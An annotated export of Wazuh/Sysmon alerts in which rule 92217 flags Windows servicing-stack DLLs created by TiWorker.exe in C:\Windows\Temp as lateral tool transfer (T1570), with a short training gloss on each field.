
data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.1180755Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260590
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.116 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\ReserveManager.dll CreationUtcTime: 2025-04-20 01:55:28.116 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.116
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\ReserveManager.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.116
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.226+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.226+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  11
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy, but it can warn you of high-value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.652447
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.0635120Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260582
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.062 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\dpx.dll CreationUtcTime: 2025-04-20 01:55:28.062 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.062
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\dpx.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.062
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.244+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.244+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  12
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy, but it can warn you of high-value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.655396
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.1367565Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260595
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.135 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\turbocontainer.dll CreationUtcTime: 2025-04-20 01:55:28.135 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.135
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\turbocontainer.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.135
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.262+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.262+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  13
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.658389
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.1426878Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260596
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.140 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\turbostack.dll CreationUtcTime: 2025-04-20 01:55:28.140 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.140
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\turbostack.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.140
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.305+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.305+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  14
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.661366
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.1533935Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260597
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.152 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\updateagent.dll CreationUtcTime: 2025-04-20 01:55:28.152 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.152
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\updateagent.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.152
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.312+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.312+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  15
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.664347
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.1725412Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260598
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.170 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\UpdateCompression.dll CreationUtcTime: 2025-04-20 01:55:28.170 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.170
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\UpdateCompression.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.170
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.363+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.363+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
